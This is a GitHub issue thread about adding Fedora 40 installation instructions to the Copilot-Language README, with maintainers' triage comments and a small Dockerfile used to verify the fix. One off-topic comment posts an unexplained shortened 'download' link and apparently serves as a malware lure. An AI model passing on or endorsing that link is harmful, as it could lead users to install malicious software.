### ISSUE TITLE
`copilot`: Update README with new installation process in Fedora

### ISSUE THREAD

**Issue by ivanperez-keera** [Copilot-Language/copilot#542]
**Description**

Copilot is now available in Fedora 40, which makes installation much easier for users on that platform.

The installation instructions should be updated to reflect the simpler installation process for users on that platform.

**Type**

- Management: improve documentation due to changing environment.

**Additional context**

None.

**Requester**

- Ivan Perez

**Method to check presence of bug**

Not applicable (issue in documentation).

**Expected result**

The README contains installation instructions that work with Fedora 40.

**Desired result**

The README contains installation instructions that work with Fedora 40.

**Proposed solution**

Update README with a new subsection, similar to https://github.com/Copilot-Language/copilot?tab=readme-ov-file#debian-bookworm--ubuntu-2304, specialized for Fedora 40 or newer.

**Further notes**

None.

**Comment by KERERCVASD** [comment]
download
https://bit.ly/4evXrQ6
If you don't have the c compliator, install it.(gcc or clang)

**Comment by ivanperez-keera** [comment]
Change Manager: Confirmed that the issue exists.

**Comment by ivanperez-keera** [comment]
Technical Lead: Confirmed that the issue should be addressed.

**Comment by ivanperez-keera** [comment]
Technical Lead: Issue scheduled for fixing in Copilot 4.1.

Fix assigned to: @fdedden .

**Comment by fdedden** [comment]
Implementor: Solution implemented, review requested.

**Comment by ivanperez-keera** [comment]
Change Manager: Verified that:
- Solution is implemented:
  - [X] The code proposed compiles and passes all tests. Details:
    Build log: https://app.travis-ci.com/github/Copilot-Language/copilot/builds/272910236
  - [X] The solution proposed produces the expected result. Details:
    The following dockerfile checks that Copilot can be installed following the instructions in the README, after which it prints the message "Success". We specifically check that GHC is also installed and that Copilot can later be found:
    ```
    FROM fedora:40
    
    RUN dnf -y install ghc-copilot-devel
    RUN runhaskell <<< 'import Language.Copilot; main = putStrLn "Success"'
    ```
    This docker file contains no `CMD`, so building the image is enough to check.
- [X] Implementation is documented. Details:
  Change is to the documentation.
- [X] Change history is clear.
- [X] Commit messages are clear.
- [X] Changelogs are updated.
- [X] Examples are updated. Details:
  No updates needed. Change is to the README.
- [X] Required version bumps are evaluated. Details:
  No bump needed. Change is to the README.

**Comment by ivanperez-keera** [comment]
Change Manager: Implementation ready to be merged.
